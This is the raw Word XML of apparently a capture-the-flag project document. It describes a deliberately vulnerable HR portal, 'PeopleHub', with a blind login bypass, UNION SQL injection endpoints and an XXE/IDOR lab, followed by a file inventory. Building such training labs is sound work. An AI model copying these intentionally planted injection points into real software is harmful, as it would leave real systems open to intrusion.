    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Design flaw fixed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blind login bypass originally landed on the Administrator account directly — reordered seed insertion so it lands on a low-privilege account instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bug fixed (2 endpoints):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>COUNT(*)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + paginated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used the same raw injected string but had different column counts, making UNION injection impossible as first built.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bug fixed (2 endpoints):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> discovery-detection checked column names or falsy values, neither of which can reliably catch a UNION injection; switched to content-based checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Verified end to end: a single live session ran the entire nine-flag chain and returned the correct Exhibit C flag. Confirmed zero regression — Stage 4’s own, separate XXE/IDOR lab still works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part IV — File Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Modified (pre-existing files)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5112"/>
        <w:gridCol w:w="5112"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>public/sound.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-page playback position persistence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>challenges.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Expanded HR Portal employee/user data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lib/hrdb.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Login WAF + search WAF + department injection point.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>public/hr-portal.html/js/css</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Department filter UI, stats strip. Now orphaned but functional.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PeopleHub mount points, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/ctf-admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> gating, Exhibit C completion rewired.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>public/exhibit-c.html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6336"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Narrative and status polling rewritten for PeopleHub.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Created — PeopleHub backend &amp; frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>lib/peoplehub/db.js, session.js, rbac.js, helpers.js, challengeState.js, router.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>lib/peoplehub/routes/  (12 files: timepay, documents, requests, reports, recruitment, training,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                         comms, audit, admin, importxml, feedback, emergency)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>public/peoplehub/shared/ (api.js, shell.js, shell.css, table.js) + 23 page pairs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Created — data, database, synthetic filesystem, docs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>seed/config.js, seed/data/*.js, seed/lib/rng.js, seed/generators/*.js, seed/seed.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>db/schema.sql, db/peoplehub.sqlite (generated)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>challenge-data/hr/*.txt, config/*.txt, reports/*.txt, archive/*.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>public/ctf-admin.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>README.md, CHALLENGE_GUIDE.md, CHALLENGE_GUIDE.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>SOLSTICE_CTF_PROJECT_DOCUMENTATION.docx   (this document)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="8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20"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="123B78"/>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outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="123B78"/>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outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="123B78"/>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120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2563C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